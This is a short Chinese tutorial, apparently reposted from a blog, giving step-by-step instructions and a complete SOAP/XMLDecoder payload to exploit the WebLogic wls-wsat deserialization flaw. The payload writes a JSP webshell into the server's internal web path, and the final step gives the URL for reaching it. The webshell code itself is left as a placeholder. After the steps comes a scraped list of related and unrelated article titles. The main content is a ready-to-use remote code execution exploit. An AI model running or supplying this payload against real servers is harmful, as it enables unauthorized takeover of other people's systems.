1、访问http://x.x.x.x:7001/wls-wsat/CoordinatorPortType

2、加入Content-Type:text/xml

3、在body中放入payload:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/pan.jsp</string><void method="println"><string><![CDATA[`此处放马(因为马的代码量太长顾不在此处展示ps:此处上传的不要带有中文要不会报错,可删掉中文上传,也可进行编码处理)`]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope> 

4、访问http://xx.xx.xx.xx:7001/bea_wls_internal/pan.jsp?o=index

转载于:https://www.cnblogs.com/peterpan0707007/p/10565968.html

【实战】Weblogic xmldecoder反序列化Getshell相关推荐

  1. CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞

    漏洞产生原因: CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据 ...

  2. cve-2017–10271 XMLDecoder 反序列化漏洞 原理分析

    目录 1.漏洞背景 2.漏洞原理分析 3.漏洞测试 环境搭建 漏洞复现 4.修复建议 1.漏洞背景 Weblogic是oracle推出的application server,由于其具有支持EJB.JS ...

  3. jdk紧急漏洞,XMLDecoder反序列化攻击

    昨天在公司发现了一个jdk中的XMLDecoder反序列化的漏洞,看起来很危险!下面通过两个示例来看看这个漏洞的危害! 示例1:利用XmlDecoder删除本地文件 首先来看这个xmldecoder. ...

  4. 一步一步回顾分析攻防演习中的 WebLogic T3 反序列化 0day 漏洞

     聚焦源代码安全,网罗国内外最新资讯! 本文内容共分六部分: 一.前言 二.Jdk7u21 的 PoC 分析 1.第一部分利用链分析 2.第二部分利用链分析 三.MarshalledObject分析 ...

  5. WebLogic RMI 反序列化漏洞

    文章目录 WebLogic RMI 反序列化 基础知识 影响版本 漏洞概述 漏洞危害 漏洞复现 目标机搭建漏洞环境 漏洞验证 端口探测 漏洞检测脚本 在kali上运行命令 下载反序列化漏洞利用工具 y ...

  6. Weblogic IIOP反序列化漏洞(CVE-2020-2551) 漏洞分析

    0x00 前言 2020年1月15日, Oracle官方发布了CVE-2020-2551的漏洞通告,漏洞等级为高危,CVVS评分为9.8分,漏洞利用难度低.影响范围为10.3.6.0.0, 12.1. ...

  7. 实战渗透-Shiro反序列化漏洞实例

    0x01.前言 这是一次授权的渗透测试,技术含量不高,但我始终相信,每一次的积累,都是为了成就更好的自己,所以过程简洁,记录下每个知识点.对渗透而言,我更喜欢实战的体验感,那种喜悦和知识的获取感,永远 ...

  8. WebLogic UniversalExtractor反序列化漏洞(CVE-2020-14645)的复现和分析

     聚焦源代码安全,网罗国内外最新资讯! 1.1 状态 完成漏洞挖掘条件分析.漏洞复现. 1.2 简介 WebLogic 是美国 Oracle 公司的 Java 应用服务器,确切说是一个中间件,被用于W ...

  9. fastjson 序列化 不包括转义字符_CVE-2020-14644 weblogic iiop反序列化漏洞分析

    报告编号:B6-2020-081101 报告来源:360CERT 报告作者:ph4nt0mer 更新日期:2020-08-11 0x01 weblogic 受影响版本 Oracle WebLogic ...

最新文章

  1. Java 多线程 之 suspend挂起 线程实例
  2. SOCKET是调用操作系统通信服务的一种机制
  3. 在CentOS下安装crontab服务
  4. .NET访问PI数据库
  5. spring的注解开发@Component @Bean @Value @Autowired、@Qualifier @PropertySource @Configuration
  6. VS2015中快捷注释代码块
  7. java 获取mp3 id3v2_MP3文件的ID3V1信息与ID3V2信息结构的分析
  8. 支付宝APP支付 统一下单 php服务端 tp5
  9. java ajax html复选框,HTMLjavaSkcriptCSSjQueryajax(九)(示例代码)
  10. 一文理解设计模式--命令模式(Command)
  11. while循环 for循环的理解
  12. javascript js 拖动效果 兼 ie 6,7,8 firefox Chrome(原创,想要尽管拿去用。技术支持:QQ3084532)...
  13. 遐想ORACLE的下步收购
  14. 【源码阅读】Java集合之一 - ArrayList源码深度解读
  15. 瀚高数据库并行导入导出
  16. Windows驱动认证
  17. 谷歌无法加载pdf文档_如何从Google文档文档创建PDF
  18. hive-Fetch抓取
  19. 免费股票数据API接口
  20. IT新人到底该不该去外包公司?

热门文章

  1. 大数据架构师学习方向---加油。
  2. jsp映射为其他地址上去 ???
  3. 解决/usr/lib/libstdc++.so.6: version `GLIBCXX_3.4.15' not found错误的解决
  4. php中将excel写入mysql数据库的示例
  5. 第二十三篇:在SOUI中使用LUA脚本开发界面
  6. ubuntu安装postgreSQL 9.3
  7. ubuntu使用ssh登入不执行.bashrc解决方法
  8. 黄聪:Discuz X2.0 SEO:论坛面包屑导航伪静态 去掉面包屑导航forum.php(转)
  9. 去除html标签的工具类,Java正则匹配过滤移除html标签以及获取img完整标签工具类...
  10. execv shell_exec系列函数(execl,execlp,execle,execv,execvp)使用